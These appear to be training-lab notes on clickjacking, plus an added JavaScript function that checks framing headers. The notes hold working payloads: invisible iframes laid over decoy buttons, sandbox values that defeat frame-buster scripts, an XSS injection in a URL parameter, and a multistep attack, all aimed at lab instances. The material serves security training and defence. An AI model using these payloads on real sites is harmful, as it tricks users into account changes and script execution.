Clickjacking is possible only if the website has a dangerous action that can be triggered by a click and the page can be loaded in an iframe.
Basic clickjacking with CSRF token protection
<style>
iframe {
position:relative;
width:1000px;
height:700px;
opacity: 0.00001;
z-index: 2;
}
div {
position:absolute;
top:515px;
left:60px;
z-index: 1;
}
</style>
<div>click me</div>
<iframe src="https://0aa500560340a455859186e1007e0063.web-security-academy.net/my-account"></iframe>
Clickjacking with form input data prefilled from a URL parameter
<style>
iframe {
position:relative;
width:700px;
height:500px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:460px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a0d00ad03731b2180c2a3b300250083.web-security-academy.net/[email protected]"></iframe>
Clickjacking with a frame buster script
To bypass the anti-framing script:
sandbox="allow-forms"
or sandbox="allow-scripts"
or sandbox="allow-top-navigation"
<style>
iframe {
position:relative;
width:700px;
height:500px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:460px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0a3400af04565e5880ed8adf005e00e5.web-security-academy.net/[email protected]" sandbox="allow-forms"></iframe>
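Clickjacking needs the page to be frameable at all, and the sandbox attribute above switches off a script-based frame buster, so the protection that counts is in the response headers. The following is an added example (not part of the original notes) that classifies a response by its X-Frame-Options and Content-Security-Policy frame-ancestors values; the function name framingVerdict and the sample headers are constructed for illustration.

```javascript
// Added example, not from the original notes. Header sets below are constructed.
// Returns "blocked" (no one may frame), "restricted" (same origin or allowlist)
// or "frameable" (any origin may frame, so overlay pages like the ones above work).
function framingVerdict(headers) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) {
    h[k.toLowerCase()] = Array.isArray(v) ? v.join(", ") : String(v);
  }
  // Collect frame-ancestors from each enforced policy (a comma starts a new policy).
  // Content-Security-Policy-Report-Only is deliberately not read: it blocks nothing.
  const ancestors = (h["content-security-policy"] || "")
    .split(",")
    .map((policy) => policy.split(";").map((d) => d.trim().split(/\s+/))
      .find((d) => d[0].toLowerCase() === "frame-ancestors"))
    .filter(Boolean)
    .map((d) => d.slice(1).map((s) => s.toLowerCase()));
  if (ancestors.length > 0) {
    // frame-ancestors overrides X-Frame-Options; the strictest policy decides.
    const rank = ancestors.map((src) => {
      if (src.every((s) => s === "'none'")) return 0; // also true for an empty list
      // "*", a bare scheme ("https:") or "https://*" match every embedding origin.
      return src.some((s) => /^(\*|[a-z][a-z0-9+.-]*:(\/\/\*)?)$/.test(s)) ? 2 : 1;
    });
    return ["blocked", "restricted", "frameable"][Math.min(...rank)];
  }
  const xfo = new Set((h["x-frame-options"] || "").split(",")
    .map((v) => v.trim().toLowerCase()).filter(Boolean));
  if (xfo.size > 1) {
    // Conflicting values: the HTML Standard fails closed if any known value is present.
    return ["deny", "sameorigin", "allowall"].some((v) => xfo.has(v))
      ? "blocked" : "frameable";
  }
  if (xfo.has("deny")) return "blocked";
  if (xfo.has("sameorigin")) return "restricted";
  return "frameable"; // no header, obsolete ALLOW-FROM, or an unrecognised value
}

// Constructed sample responses: label -> response headers.
const SAMPLES = {
  "no framing headers (JS frame buster only)": {},
  "XFO DENY": { "X-Frame-Options": "DENY" },
  "obsolete ALLOW-FROM": { "X-Frame-Options": "ALLOW-FROM https://partner.example" },
  "CSP frame-ancestors 'self'": { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'" },
  "report-only CSP": { "Content-Security-Policy-Report-Only": "frame-ancestors 'none'" },
  "wildcard CSP beside XFO DENY": { "Content-Security-Policy": "frame-ancestors *", "X-Frame-Options": "DENY" },
};
for (const [label, hdrs] of Object.entries(SAMPLES)) console.log(label, "->", framingVerdict(hdrs));
```

A "frameable" verdict on a page that performs a state-changing action is the condition every section of these notes depends on; sending `Content-Security-Policy: frame-ancestors 'none'` (or `'self'`) removes it regardless of any iframe sandbox setting.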
Exploiting clickjacking vulnerability to trigger DOM-based XSS
There is a DOM-based XSS in the name parameter of the submit feedback form, but the victim has to click on "Submit feedback" to trigger the XSS.
<style>
iframe {
position:relative;
width:1000px;
height:1000px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:820px;
left:80px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://0abc00eb04e4f07c80323ad800590048.web-security-academy.net/feedback?name=%3Cimg%20src=1%20onerror=print()%3E&[email protected]&subject=test&message=test#feedbackResult"></iframe>
Multistep clickjacking
<style>
iframe {
position:relative;
width:1000px;
height:1000px;
opacity: 0.0001;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:520px;
left:40px;
z-index: 1;
}
.secondClick {
top:310px;
left:195px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://0a85000604a73b83819dd93100e5003a.web-security-academy.net/my-account"></iframe>